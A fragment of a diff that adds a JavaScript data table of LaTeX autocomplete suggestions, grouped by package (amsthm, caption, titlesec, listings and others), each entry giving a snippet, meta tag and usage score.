'\\toprule', + meta: 'booktabs-cmd', + score: 0.059857788139528495, + }, + ], + amsfonts: [ + { + caption: '\\frak{}', + snippet: '\\frak{$1}', + meta: 'amsfonts-cmd', + score: 0.0017966000518546787, + }, + { + caption: '\\checkmark', + snippet: '\\checkmark', + meta: 'amsfonts-cmd', + score: 0.025060530944368123, + }, + { + caption: '\\bold', + snippet: '\\bold', + meta: 'amsfonts-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\bold{}', + snippet: '\\bold{$1}', + meta: 'amsfonts-cmd', + score: 0.0014358547624941567, + }, + { + caption: '\\Bbb{}', + snippet: '\\Bbb{$1}', + meta: 'amsfonts-cmd', + score: 0.0006671850995492977, + }, + { + caption: '\\Bbb', + snippet: '\\Bbb', + meta: 'amsfonts-cmd', + score: 0.0006671850995492977, + }, + ], + float: [ + { + caption: '\\listof{}{}', + snippet: '\\listof{$1}{$2}', + meta: 'float-cmd', + score: 0.0009837365348002915, + }, + { + caption: '\\floatplacement{}{}', + snippet: '\\floatplacement{$1}{$2}', + meta: 'float-cmd', + score: 0.0005815474978918903, + }, + { + caption: '\\restylefloat{}', + snippet: '\\restylefloat{$1}', + meta: 'float-cmd', + score: 0.0008866338267686714, + }, + { + caption: '\\floatstyle{}', + snippet: '\\floatstyle{$1}', + meta: 'float-cmd', + score: 0.0015470917047414941, + }, + { + caption: '\\floatname{}{}', + snippet: '\\floatname{$1}{$2}', + meta: 'float-cmd', + score: 0.0011934321931750752, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'float-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'float-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\newfloat{}{}{}', + snippet: '\\newfloat{$1}{$2}{$3}', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat', + snippet: '\\newfloat', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + { + caption: '\\newfloat{}', + snippet: '\\newfloat{$1}', + meta: 'float-cmd', + score: 0.0012745874472536625, + }, + ], + amsthm: [ + { + caption: '\\swapnumbers', + snippet: '\\swapnumbers', + meta: 'amsthm-cmd', + score: 0.0002908376412221364, + }, + { + caption: '\\qedhere', + snippet: '\\qedhere', + meta: 'amsthm-cmd', + score: 0.0001608548097938035, + }, + { + caption: '\\qed', + snippet: '\\qed', + meta: 'amsthm-cmd', + score: 0.0014240748825867814, + }, + { + caption: '\\qed{}', + snippet: '\\qed{$1}', + meta: 'amsthm-cmd', + score: 0.0014240748825867814, + }, + { + caption: '\\newtheoremstyle{}', + snippet: '\\newtheoremstyle{$1}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\newtheoremstyle{}{}{}', + snippet: '\\newtheoremstyle{$1}{$2}{$3}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\newtheoremstyle{}{}{}{}', + snippet: '\\newtheoremstyle{$1}{$2}{$3}{$4}', + meta: 'amsthm-cmd', + score: 0.004259886909451789, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'amsthm-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\proofname', + snippet: '\\proofname', + meta: 'amsthm-cmd', + score: 0.00021208362094925234, + }, + { + caption: '\\pushQED{}', + snippet: '\\pushQED{$1}', + meta: 'amsthm-cmd', + score: 0.00019346981338869148, + }, + { + caption: '\\qedsymbol', + snippet: '\\qedsymbol', + meta: 'amsthm-cmd', + score: 0.0022671784428571723, + }, + { + caption: '\\qedsymbol{}', + snippet: '\\qedsymbol{$1}', + meta: 'amsthm-cmd', + score: 0.0022671784428571723, + }, + { + caption: '\\popQED', + snippet: '\\popQED', + meta: 'amsthm-cmd', + score: 9.673490669434574e-5, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'amsthm-cmd', + score: 0.215689795055434, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'amsthm-cmd', + score: 0.0063276692758974925, + }, + ], + caption: [ + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'caption-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'caption-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'caption-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'caption-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'caption-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'caption-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'caption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'caption-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'caption-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'caption-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'caption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'caption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'caption-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption-cmd', + score: 0.021473212893597875, + }, + ], + ifthen: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'ifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'ifthen-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'ifthen-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'ifthen-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'ifthen-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'ifthen-cmd', + score: 0.0018957469739775527, + }, + ], + setspace: [ + { + caption: '\\setstretch{}', + snippet: '\\setstretch{$1}', + meta: 'setspace-cmd', + score: 0.019634763572332112, + }, + { + caption: '\\onehalfspacing', + snippet: '\\onehalfspacing', + meta: 'setspace-cmd', + score: 0.010655415521079565, + }, + { + caption: '\\singlespacing', + snippet: '\\singlespacing', + meta: 'setspace-cmd', + score: 0.008351544612280968, + }, + { + caption: '\\doublespacing', + snippet: '\\doublespacing', + meta: 'setspace-cmd', + score: 0.007835428951987135, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'setspace-cmd', + score: 0.03225350148161425, + }, + ], + multirow: [ + { + caption: '\\multirow{}{}{}', + snippet: '\\multirow{$1}{$2}{$3}', + meta: 'multirow-cmd', + score: 0.07525389638751734, + }, + { + caption: '\\multirow{}[]{}{}', + snippet: '\\multirow{$1}[$2]{$3}{$4}', + meta: 'multirow-cmd', + score: 0.07525389638751734, + }, + ], + array: [ + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'array-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'array-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'array-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'array-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'array-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'array-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'array-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'array-cmd', + score: 0.018615449342361392, + }, + ], + titlesec: [ + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'titlesec-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'titlesec-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'titlesec-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'titlesec-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'titlesec-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'titlesec-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'titlesec-cmd', + score: 0.023062744385192156, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'titlesec-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'titlesec-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'titlesec-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'titlesec-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'titlesec-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'titlesec-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'titlesec-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'titlesec-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'titlesec-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'titlesec-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'titlesec-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'titlesec-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'titlesec-cmd', + score: 0.019273712561461216, + }, + ], + multicol: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'multicol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'multicol-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\raggedcolumns', + snippet: '\\raggedcolumns', + meta: 'multicol-cmd', + score: 0.00027461965178228156, + }, + { + caption: '\\columnbreak', + snippet: '\\columnbreak', + meta: 'multicol-cmd', + score: 0.002609610141555795, + }, + { + caption: '\\columnseprulecolor{}', + snippet: '\\columnseprulecolor{$1}', + meta: 'multicol-cmd', + score: 1.3314892207625771e-5, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'multicol-cmd', + score: 0.1789117552185788, + }, + ], + listings: [ + { + caption: '\\vskip', + snippet: '\\vskip', + meta: 'listings-cmd', + score: 0.05143052892347224, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'listings-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'listings-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'listings-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\thelstlisting', + snippet: '\\thelstlisting', + meta: 'listings-cmd', + score: 0.00012774128088872144, + }, + { + caption: '\\lstinputlisting[]{}', + snippet: '\\lstinputlisting[$1]{$2}', + meta: 'listings-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\lstinputlisting{}', + snippet: '\\lstinputlisting{$1}', + meta: 'listings-cmd', + score: 0.011660477607086044, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'listings-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'listings-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\lstinline', + snippet: '\\lstinline', + meta: 'listings-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstinline{}', + snippet: '\\lstinline{$1}', + meta: 'listings-cmd', + score: 0.005972262850694285, + }, + { + caption: '\\lstlistoflistings', + snippet: '\\lstlistoflistings', + meta: 'listings-cmd', + score: 0.005279080363360602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'listings-cmd', + score: 0.00037306820619479756, + }, + ], + blindtext: [ + { + caption: '\\glqq', + snippet: '\\glqq', + meta: 'blindtext-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\glqq{}', + snippet: '\\glqq{$1}', + meta: 'blindtext-cmd', + score: 0.0039133256714254504, + }, + { + caption: '\\blindtext', + snippet: '\\blindtext', + meta: 'blindtext-cmd', + score: 0.05782040856823667, + }, + { + caption: '\\blindtext[]', + snippet: '\\blindtext[$1]', + meta: 'blindtext-cmd', + score: 0.05782040856823667, + }, + { + caption: '\\Blindtext', + snippet: '\\Blindtext', + meta: 'blindtext-cmd', + score: 0.006384906903938044, + }, + { + caption: '\\grqq', + snippet: '\\grqq', + meta: 'blindtext-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\grqq{}', + snippet: '\\grqq{$1}', + meta: 'blindtext-cmd', + score: 0.006659522189248266, + }, + { + caption: '\\blinddocument', + snippet: '\\blinddocument', + meta: 'blindtext-cmd', + score: 0.00011480988129172825, + }, + { + caption: '\\xspace', + snippet: '\\xspace', + meta: 'blindtext-cmd', + score: 0.07560370351316588, + }, + ], + enumitem: [ + { + caption: '\\newlist{}{}{}', + snippet: '\\newlist{$1}{$2}{$3}', + meta: 'enumitem-cmd', + score: 0.0007266225924074459, + }, + { + caption: '\\setlist[]{}', + snippet: '\\setlist[$1]{$2}', + meta: 'enumitem-cmd', + score: 0.010895384475728338, + }, + { + caption: '\\setlist{}', + snippet: '\\setlist{$1}', + meta: 'enumitem-cmd', + score: 0.010895384475728338, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'enumitem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'enumitem-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setlistdepth{}', + snippet: '\\setlistdepth{$1}', + meta: 'enumitem-cmd', + score: 0.0001113322912630871, + }, + { + caption: '\\setenumerate[]{}', + snippet: '\\setenumerate[$1]{$2}', + meta: 'enumitem-cmd', + score: 7.437178301071255e-5, + }, + { + caption: '\\setenumerate{}', + snippet: '\\setenumerate{$1}', + meta: 'enumitem-cmd', + score: 7.437178301071255e-5, + }, + { + caption: '\\renewlist{}{}{}', + snippet: '\\renewlist{$1}{$2}{$3}', + meta: 'enumitem-cmd', + score: 0.0001113322912630871, + }, + { + caption: '\\descriptionlabel{}', + snippet: '\\descriptionlabel{$1}', + meta: 'enumitem-cmd', + score: 7.678089052626698e-6, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'enumitem-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\setitemize[]{}', + snippet: '\\setitemize[$1]{$2}', + meta: 'enumitem-cmd', + score: 0.0019580640711971786, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'enumitem-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'enumitem-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\makelabel', + snippet: '\\makelabel', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel{}', + snippet: '\\makelabel{$1}', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + { + caption: '\\makelabel[]{}', + snippet: '\\makelabel[$1]{$2}', + meta: 'enumitem-cmd', + score: 5.739925426740175e-5, + }, + ], + times: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + meta: 'times-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'times-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'times-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\ttdefault', + snippet: '\\ttdefault', + meta: 'times-cmd', + score: 0.0011733254149332488, + }, + { + caption: '\\ttdefault{}', + snippet: '\\ttdefault{$1}', + meta: 'times-cmd', + score: 0.0011733254149332488, + }, + ], + subcaption: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subcaption-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subcaptionbox{}{}', + snippet: '\\subcaptionbox{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0008634329663023698, + }, + { + caption: '\\newsubfloat{}', + snippet: '\\newsubfloat{$1}', + meta: 'subcaption-cmd', + score: 0.000615805121082521, + }, + { + caption: '\\subcaption{}', + snippet: '\\subcaption{$1}', + meta: 'subcaption-cmd', + score: 0.006820005741581297, + }, + { + caption: '\\subcaption[]{}', + snippet: '\\subcaption[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.006820005741581297, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'subcaption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'subcaption-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'subcaption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'subcaption-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'subcaption-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'subcaption-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'subcaption-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'subcaption-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'subcaption-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'subcaption-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'subcaption-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'subcaption-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'subcaption-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'subcaption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'subcaption-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'subcaption-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'subcaption-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'subcaption-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'subcaption-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'subcaption-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'subcaption-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'subcaption-cmd', + score: 0.021473212893597875, + }, + ], + bm: [ + { + caption: '\\bm{}', + snippet: '\\bm{$1}', + meta: 'bm-cmd', + score: 0.14733018077819282, + }, + { + caption: '\\bm', + snippet: '\\bm', + meta: 'bm-cmd', + score: 0.14733018077819282, + }, + ], + fontspec: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'fontspec-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'fontspec-cmd', + score: 0.2864294797053033, + }, + ], + subfigure: [ + { + caption: '\\subref{}', + snippet: '\\subref{$1}', + meta: 'subfigure-cmd', + score: 0.007192033516871399, + }, + { + caption: '\\subfigure[]{}', + snippet: '\\subfigure[$1]{$2}', + meta: 'subfigure-cmd', + score: 0.037856842641104005, + }, + ], + calc: [ + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'calc-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'calc-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'calc-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'calc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'calc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'calc-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'calc-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'calc-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'calc-cmd', + score: 0.028955796305270766, + }, + ], + tabularx: [ + { + caption: '\\let', + snippet: '\\let', + meta: 'tabularx-cmd', + score: 0.03789745970461662, + }, + { + caption: '\\write', + snippet: '\\write', + meta: 'tabularx-cmd', + score: 0.0008038857295393196, + }, + { + caption: '\\tabularxcolumn[]{}', + snippet: '\\tabularxcolumn[$1]{$2}', + meta: 'tabularx-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularxcolumn', + snippet: '\\tabularxcolumn', + meta: 'tabularx-cmd', + score: 0.00048507499766588637, + }, + { + caption: '\\tabularx{}{}', + snippet: '\\tabularx{$1}{$2}', + meta: 'tabularx-cmd', + score: 0.0005861357565780464, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabularx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabularx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabularx-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabularx-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabularx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabularx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabularx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabularx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabularx-cmd', + score: 0.018615449342361392, + }, + ], + algorithm: [ + { + caption: '\\listalgorithmname', + snippet: '\\listalgorithmname', + meta: 'algorithm-cmd', + score: 0.00022490402516652368, + }, + { + caption: '\\listofalgorithms', + snippet: '\\listofalgorithms', + meta: 'algorithm-cmd', + score: 0.0012576983422794912, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algorithm-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algorithm-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algorithm-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: 